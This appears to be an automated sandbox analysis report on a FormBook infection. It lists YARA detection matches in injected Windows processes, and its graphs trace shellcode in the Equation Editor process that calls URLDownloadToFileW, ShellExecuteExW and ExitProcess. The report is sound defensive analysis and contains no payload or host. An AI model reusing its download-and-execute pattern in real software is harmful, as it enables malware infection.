                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Target ID:10
                                            Start time:15:11:03
                                            Start date:14/05/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0xff040000
                                            File size:3229696 bytes
                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Target ID:11
                                            Start time:15:11:32
                                            Start date:14/05/2022
                                            Path:C:\Windows\SysWOW64\mstsc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\mstsc.exe
                                            Imagebase:0x3b0000
                                            File size:1068544 bytes
                                            MD5 hash:4676AAA9DDF52A50C829FEDB4EA81E54
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Target ID:13
                                            Start time:15:12:23
                                            Start date:14/05/2022
                                            Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
                                            Imagebase:0x8b0000
                                            File size:517064 bytes
                                            MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:31.6%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:73%
                                              Total number of Nodes:152
                                              Total number of Limit Nodes:8
                                              execution_graph 446 3690381 447 3690383 446->447 448 3690388 447->448 464 3690396 LoadLibraryW 447->464 480 36903b0 448->480 457 3690452 459 3690461 ShellExecuteExW 457->459 461 36904b8 457->461 513 3690480 459->513 462 3690474 462->461 463 3690483 ExitProcess 462->463 465 3690398 464->465 466 36903b0 11 API calls 465->466 467 369039d 466->467 468 3690401 8 API calls 467->468 469 36903c1 URLDownloadToFileW 468->469 471 369044b 5 API calls 469->471 472 369043b 471->472 473 3690452 472->473 474 3690462 3 API calls 472->474 475 3690461 ShellExecuteExW 473->475 477 36904b8 473->477 474->473 476 3690480 ExitProcess 475->476 478 3690474 476->478 477->448 478->477 479 3690483 ExitProcess 478->479 481 36903b3 480->481 482 36903c1 URLDownloadToFileW 481->482 483 3690401 8 API calls 481->483 485 369044b 5 API calls 482->485 483->482 486 369043b 485->486 487 3690462 3 API calls 486->487 488 3690452 486->488 487->488 489 3690461 ShellExecuteExW 488->489 491 369039d 488->491 490 3690480 ExitProcess 489->490 492 3690474 490->492 494 3690401 URLDownloadToFileW 491->494 492->491 493 3690483 ExitProcess 492->493 495 369043b 494->495 496 369044b 5 API calls 494->496 497 3690452 495->497 498 3690462 3 API calls 495->498 496->495 499 3690461 ShellExecuteExW 497->499 500 36903c1 URLDownloadToFileW 497->500 498->497 501 3690480 ExitProcess 499->501 504 369044b 500->504 502 3690474 501->502 502->500 503 3690483 ExitProcess 502->503 505 369044d 504->505 506 3690462 3 API calls 505->506 507 3690452 506->507 508 3690461 ShellExecuteExW 507->508 510 369043b 507->510 509 3690480 ExitProcess 508->509 511 3690474 509->511 510->457 515 3690462 510->515 511->510 512 3690483 ExitProcess 511->512 514 3690483 ExitProcess 513->514 516 3690465 ShellExecuteExW 515->516 517 3690480 ExitProcess 516->517 518 3690474 516->518 517->518 519 36904bb 518->519 520 3690483 ExitProcess 518->520 519->457 523 36902f1 ExitProcess 544 369030a 523->544 526 36903b0 11 API calls 528 369039d 526->528 529 3690401 8 API calls 528->529 530 36903c1 URLDownloadToFileW 529->530 532 369044b 5 API calls 530->532 533 369043b 532->533 536 3690452 533->536 537 3690462 3 API calls 533->537 539 3690461 ShellExecuteExW 536->539 541 36904b8 536->541 537->536 538 369035f 538->526 540 3690480 ExitProcess 539->540 542 3690474 540->542 542->541 543 3690483 ExitProcess 542->543 545 3690310 544->545 602 3690326 545->602 547 369035f 549 36903b0 11 API calls 547->549 551 369039d 549->551 550 369034d 21 API calls 557 3690333 550->557 552 3690401 8 API calls 551->552 553 36903c1 URLDownloadToFileW 552->553 555 369044b 5 API calls 553->555 556 369043b 555->556 559 3690452 556->559 560 3690462 3 API calls 556->560 557->547 557->551 558 3690381 18 API calls 557->558 558->547 561 3690461 ShellExecuteExW 559->561 563 36902fd 559->563 560->559 562 3690480 ExitProcess 561->562 564 3690474 562->564 563->538 566 369034d 563->566 564->563 565 3690483 ExitProcess 564->565 567 3690350 566->567 568 3690381 18 API calls 567->568 569 369035f 568->569 570 36903b0 11 API calls 569->570 571 369039d 570->571 572 3690401 8 API calls 571->572 573 36903c1 URLDownloadToFileW 572->573 575 369044b 5 API calls 573->575 576 369043b 575->576 577 3690452 576->577 578 3690462 3 API calls 576->578 579 3690333 577->579 580 3690461 ShellExecuteExW 577->580 578->577 579->528 579->538 584 3690381 579->584 581 3690480 ExitProcess 580->581 582 3690474 581->582 582->579 583 3690483 ExitProcess 582->583 585 3690383 584->585 586 3690388 585->586 587 3690396 15 API calls 585->587 588 36903b0 11 API calls 586->588 587->586 589 369039d 588->589 590 3690401 8 API calls 589->590 591 36903c1 URLDownloadToFileW 590->591 593 369044b 5 API calls 591->593 594 369043b 593->594 595 3690452 594->595 596 3690462 3 API calls 594->596 597 3690461 ShellExecuteExW 595->597 599 36904b8 595->599 596->595 598 3690480 ExitProcess 597->598 600 3690474 598->600 599->538 600->599 601 3690483 ExitProcess 600->601 603 369032c 602->603 604 369034d 21 API calls 603->604 612 3690333 603->612 604->612 605 369039d 606 3690401 8 API calls 605->606 607 36903c1 URLDownloadToFileW 606->607 610 369044b 5 API calls 607->610 609 36903b0 11 API calls 609->605 611 369043b 610->611 614 3690452 611->614 615 3690462 3 API calls 611->615 612->605 613 3690381 18 API calls 612->613 616 369035f 612->616 613->616 617 3690461 ShellExecuteExW 614->617 619 3690317 614->619 615->614 616->609 618 3690480 ExitProcess 617->618 620 3690474 618->620 619->547 619->550 620->619 621 3690483 ExitProcess 620->621 521 3690487 GetPEB 522 3690495 521->522

                                              Callgraph

                                              • Executed
                                              • Not Executed
                                              • Opacity -> Relevance
                                              • Disassembly available
                                              callgraph 0 Function_0369044B 7 Function_03690480 0->7 10 Function_03690462 0->10 1 Function_0369030A 1->0 3 Function_0369034D 1->3 5 Function_03690401 1->5 6 Function_03690381 1->6 1->7 8 Function_03690500 1->8 1->10 12 Function_03690326 1->12 14 Function_036903B0 1->14 2 Function_0369006D 3->0 3->5 3->6 3->7 3->10 3->14 4 Function_036904AF 5->0 5->7 5->10 6->0 6->5 6->7 6->10 6->14 15 Function_03690396 6->15 9 Function_03690183 10->7 11 Function_03690487 11->4 12->0 12->3 12->5 12->6 12->7 12->8 12->10 12->14 13 Function_036902F1 13->0 13->1 13->3 13->5 13->6 13->7 13->10 13->14 14->0 14->5 14->7 14->10 15->0 15->5 15->7 15->10 15->14

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 3690396-369044c LoadLibraryW call 36903b0 call 3690401 URLDownloadToFileW call 369044b 12 3690452-3690458 0->12 13 369044d call 3690462 0->13 14 369045a-369045f 12->14 15 36904bf-36904c3 12->15 13->12 18 36904b8 14->18 19 3690461-3690477 ShellExecuteExW call 3690480 14->19 16 36904ee-36904f7 15->16 17 36904c5-36904c6 15->17 22 36904bb-36904be 16->22 20 36904c9 17->20 18->22 19->20 34 3690479 19->34 24 36904cb-36904cf 20->24 25 36904d1-36904d5 20->25 22->15 23 36904f9 22->23 31 36904fc-36904fd 23->31 24->25 27 36904dd-36904e4 24->27 28 36904ea-36904ec 25->28 29 36904d7-36904db 25->29 32 36904e8 27->32 33 36904e6 27->33 28->31 29->27 29->28 32->16 32->28 33->28 34->28 35 369047b-3690485 ExitProcess 34->35
                                              APIs
                                              • LoadLibraryW.KERNEL32(03690388), ref: 03690396
                                                • Part of subcall function 036903B0: URLDownloadToFileW.URLMON(00000000,036903C1,?,00000000,00000000), ref: 03690403
                                                • Part of subcall function 036903B0: ShellExecuteExW.SHELL32(0000003C), ref: 0369046D
                                                • Part of subcall function 036903B0: ExitProcess.KERNEL32(00000000), ref: 03690485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd
                                              Similarity
                                              • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                              • String ID: <
                                              • API String ID: 2508257586-4251816714
                                              • Opcode ID: df70cb557f0f0cdc39313a3168e64637112d387d11a4c23a624985b3b3db8529
                                              • Instruction ID: 87698479ec13bd18b39ab4ed6b5b9f2f92149d1bb3c42b0886aa63b3c17d3382
                                              • Opcode Fuzzy Hash: df70cb557f0f0cdc39313a3168e64637112d387d11a4c23a624985b3b3db8529
                                              • Instruction Fuzzy Hash: 3031CEA280C3C1AFEB23D7304C6D769BFA8AF63504F5849CFD4C64A1A3E6689401C767
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 38 369030a-3690318 call 3690500 call 3690326 43 369036b-3690387 38->43 44 369031b 38->44 48 3690388-369038a 43->48 45 369031d-3690320 44->45 46 369038c-3690394 44->46 45->48 49 3690323 45->49 50 3690398-36903a5 call 36903b0 46->50 48->46 49->50 51 3690325-3690334 call 369034d 49->51 57 36903a6-369044c call 3690401 URLDownloadToFileW call 369044b 50->57 51->57 58 3690336-369033b 51->58 71 3690452-3690458 57->71 72 369044d call 3690462 57->72 58->57 59 369033d-3690343 58->59 59->50 63 3690345-3690368 call 3690381 59->63 63->43 73 369045a-369045f 71->73 74 36904bf-36904c3 71->74 72->71 78 36904b8 73->78 79 3690461-3690477 ShellExecuteExW call 3690480 73->79 76 36904ee-36904f7 74->76 77 36904c5-36904c6 74->77 82 36904bb-36904be 76->82 80 36904c9 77->80 78->82 79->80 94 3690479 79->94 84 36904cb-36904cf 80->84 85 36904d1-36904d5 80->85 82->74 83 36904f9 82->83 91 36904fc-36904fd 83->91 84->85 87 36904dd-36904e4 84->87 88 36904ea-36904ec 85->88 89 36904d7-36904db 85->89 92 36904e8 87->92 93 36904e6 87->93 88->91 89->87 89->88 92->76 92->88 93->88 94->88 95 369047b-3690485 ExitProcess 94->95
                                              APIs
                                              • URLDownloadToFileW.URLMON(00000000,036903C1,?,00000000,00000000), ref: 03690403
                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0369046D
                                              • ExitProcess.KERNEL32(00000000), ref: 03690485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd
                                              Similarity
                                              • API ID: DownloadExecuteExitFileProcessShell
                                              • String ID: <
                                              • API String ID: 3584569557-4251816714
                                              • Opcode ID: f368398d8b5f1d8fcb6aa113a9a9da272108c7f86db9bae7c0bbafabe86727c3
                                              • Instruction ID: 147bbc2787d630762eb3807f57d64f51999577289b6ae7c497ce9c5652492473
                                              • Opcode Fuzzy Hash: f368398d8b5f1d8fcb6aa113a9a9da272108c7f86db9bae7c0bbafabe86727c3
                                              • Instruction Fuzzy Hash: EB41E0A680D3C1AFEB13D7304D69256BFA87F57500F5C8ACFC4C64A1A3E6689505C367
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 98 3690326-369032c call 3690500 101 3690333-3690334 98->101 102 369032e call 369034d 98->102 103 36903a6-369044c call 3690401 URLDownloadToFileW call 369044b 101->103 104 3690336-369033b 101->104 102->101 121 3690452-3690458 103->121 122 369044d call 3690462 103->122 104->103 105 369033d-3690343 104->105 109 3690398-36903a5 call 36903b0 105->109 110 3690345-3690394 call 3690381 105->110 109->103 110->109 123 369045a-369045f 121->123 124 36904bf-36904c3 121->124 122->121 128 36904b8 123->128 129 3690461-3690477 ShellExecuteExW call 3690480 123->129 126 36904ee-36904f7 124->126 127 36904c5-36904c6 124->127 133 36904bb-36904be 126->133 131 36904c9 127->131 128->133 129->131 148 3690479 129->148 137 36904cb-36904cf 131->137 138 36904d1-36904d5 131->138 133->124 135 36904f9 133->135 145 36904fc-36904fd 135->145 137->138 141 36904dd-36904e4 137->141 142 36904ea-36904ec 138->142 143 36904d7-36904db 138->143 146 36904e8 141->146 147 36904e6 141->147 142->145 143->141 143->142 146->126 146->142 147->142 148->142 149 369047b-3690485 ExitProcess 148->149
                                              APIs
                                              • URLDownloadToFileW.URLMON(00000000,036903C1,?,00000000,00000000), ref: 03690403
                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0369046D
                                              • ExitProcess.KERNEL32(00000000), ref: 03690485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd
                                              Similarity
                                              • API ID: DownloadExecuteExitFileProcessShell
                                              • String ID: <
                                              • API String ID: 3584569557-4251816714
                                              • Opcode ID: cbc6daac118b704cc3a774c0fc4988c6e3103bb3906fdc566402fdaf8be021de
                                              • Instruction ID: 12286f1e7aaf3a5c172451be78039e606d614933ee5c7cb8dbf4fa1508354f93
                                              • Opcode Fuzzy Hash: cbc6daac118b704cc3a774c0fc4988c6e3103bb3906fdc566402fdaf8be021de
                                              • Instruction Fuzzy Hash: 4541EFA680D3C1AFEB13D7304D6D65ABFA8AF53500F5C8ACFC4C64A1A3E6689105C367
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 152 36903b0-36903bb 154 36903c1-369044c URLDownloadToFileW call 369044b 152->154 155 36903bc call 3690401 152->155 160 3690452-3690458 154->160 161 369044d call 3690462 154->161 155->154 162 369045a-369045f 160->162 163 36904bf-36904c3 160->163 161->160 166 36904b8 162->166 167 3690461-3690477 ShellExecuteExW call 3690480 162->167 164 36904ee-36904f7 163->164 165 36904c5-36904c6 163->165 170 36904bb-36904be 164->170 168 36904c9 165->168 166->170 167->168 182 3690479 167->182 172 36904cb-36904cf 168->172 173 36904d1-36904d5 168->173 170->163 171 36904f9 170->171 179 36904fc-36904fd 171->179 172->173 175 36904dd-36904e4 172->175 176 36904ea-36904ec 173->176 177 36904d7-36904db 173->177 180 36904e8 175->180 181 36904e6 175->181 176->179 177->175 177->176 180->164 180->176 181->176 182->176 183 369047b-3690485 ExitProcess 182->183
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd
                                              Similarity
                                              • API ID: DownloadExecuteExitFileProcessShell
                                              • String ID: <
                                              • API String ID: 3584569557-4251816714
                                              • Opcode ID: e247971d5602c11e9c92f24210118539e524b2b60bb3fad2a932206bf81e045e
                                              • Instruction ID: 71d5946a173f1d02c9ec61335866532c619a607bf3b6d051ced1a90ff6f8ff97
                                              • Opcode Fuzzy Hash: e247971d5602c11e9c92f24210118539e524b2b60bb3fad2a932206bf81e045e
                                              • Instruction Fuzzy Hash: F5216BA680D3C19FEB23D7304C6C659BFA86F67504F5889CFD4C64A1A3E6689401C767
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 186 3690401-3690434 URLDownloadToFileW 187 369043b-369044c 186->187 188 3690436 call 369044b 186->188 190 3690452-3690458 187->190 191 369044d call 3690462 187->191 188->187 192 369045a-369045f 190->192 193 36904bf-36904c3 190->193 191->190 196 36904b8 192->196 197 3690461-3690477 ShellExecuteExW call 3690480 192->197 194 36904ee-36904f7 193->194 195 36904c5-36904c6 193->195 200 36904bb-36904be 194->200 198 36904c9 195->198 196->200 197->198 212 3690479 197->212 202 36904cb-36904cf 198->202 203 36904d1-36904d5 198->203 200->193 201 36904f9 200->201 209 36904fc-36904fd 201->209 202->203 205 36904dd-36904e4 202->205 206 36904ea-36904ec 203->206 207 36904d7-36904db 203->207 210 36904e8 205->210 211 36904e6 205->211 206->209 207->205 207->206 210->194 210->206 211->206 212->206 213 369047b-3690485 ExitProcess 212->213
                                              APIs
                                              • URLDownloadToFileW.URLMON(00000000,036903C1,?,00000000,00000000), ref: 03690403
                                                • Part of subcall function 0369044B: ShellExecuteExW.SHELL32(0000003C), ref: 0369046D
                                                • Part of subcall function 0369044B: ExitProcess.KERNEL32(00000000), ref: 03690485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd
                                              Similarity
                                              • API ID: DownloadExecuteExitFileProcessShell
                                              • String ID: <
                                              • API String ID: 3584569557-4251816714
                                              • Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                                              • Instruction ID: e029401943ce7feee6ef41ac41ac5732fda8f8f2f62e806390ecbec20ee64dcf
                                              • Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                                              • Instruction Fuzzy Hash: C301D6B540D380EAFF61EB7498487AEBEE9AF84A10F54495FD45986152D934C804C72A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 216 369044b-3690458 call 3690462 220 369045a-369045f 216->220 221 36904bf-36904c3 216->221 224 36904b8 220->224 225 3690461-3690477 ShellExecuteExW call 3690480 220->225 222 36904ee-36904f7 221->222 223 36904c5-36904c6 221->223 228 36904bb-36904be 222->228 226 36904c9 223->226 224->228 225->226 240 3690479 225->240 230 36904cb-36904cf 226->230 231 36904d1-36904d5 226->231 228->221 229 36904f9 228->229 237 36904fc-36904fd 229->237 230->231 233 36904dd-36904e4 230->233 234 36904ea-36904ec 231->234 235 36904d7-36904db 231->235 238 36904e8 233->238 239 36904e6 233->239 234->237 235->233 235->234 238->222 238->234 239->234 240->234 241 369047b-3690485 ExitProcess 240->241
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd
                                              Similarity
                                              • API ID: ExecuteExitProcessShell
                                              • String ID:
                                              • API String ID: 1124553745-0
                                              • Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                              • Instruction ID: 8b896b22f267b16e19c7716f8bb8e90fa5e88fc2cfd2e82a22d0d8432cfd9c90
                                              • Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                                              • Instruction Fuzzy Hash: 5C01F459808306E4FFB0F72849482BEFA9CEB41F04FDC895BDD9644125D514A8D3C63E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 244 3690462-369046d ShellExecuteExW 246 3690474-3690477 244->246 247 369046f call 3690480 244->247 249 36904c9 246->249 250 3690479 246->250 247->246 251 36904cb-36904cf 249->251 252 36904d1-36904d5 249->252 253 369047b-3690485 ExitProcess 250->253 254 36904ea-36904ec 250->254 251->252 255 36904dd-36904e4 251->255 252->254 256 36904d7-36904db 252->256 257 36904fc-36904fd 254->257 259 36904e8 255->259 260 36904e6 255->260 256->254 256->255 259->254 261 36904ee-36904f7 259->261 260->254 264 36904f9 261->264 265 36904bf-36904c3 261->265 264->257 265->261 266 36904c5-36904c6 265->266 266->249
                                              APIs
                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0369046D
                                                • Part of subcall function 03690480: ExitProcess.KERNEL32(00000000), ref: 03690485
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd
                                              Similarity
                                              • API ID: ExecuteExitProcessShell
                                              • String ID:
                                              • API String ID: 1124553745-0
                                              • Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                              • Instruction ID: 3bb12c01004ea4d556b69a66b13560f1076ac8441fe29d91184ca37531f84ff5
                                              • Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                              • Instruction Fuzzy Hash: 9EF02299844342E1FF70E23889583FEAB5DAB51F10FCC8957DC8200545D068A4C38739
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 267 3690480-3690485 ExitProcess
                                              APIs
                                              • ExitProcess.KERNEL32(00000000), ref: 03690485
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                              • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                              • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 269 3690487-3690492 GetPEB 270 3690495-36904a6 call 36904af 269->270 273 36904a8-36904ac 270->273
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                              • Instruction ID: 8203ecf6b3f26aa171d15c70082f2658f6bd77ef8987c2093a1c67ba19f80820
                                              • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                              • Instruction Fuzzy Hash: 75D09E75211502DFD705DF04CA40E57F36AFFD4A21B24C669D5144B719D730E891CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
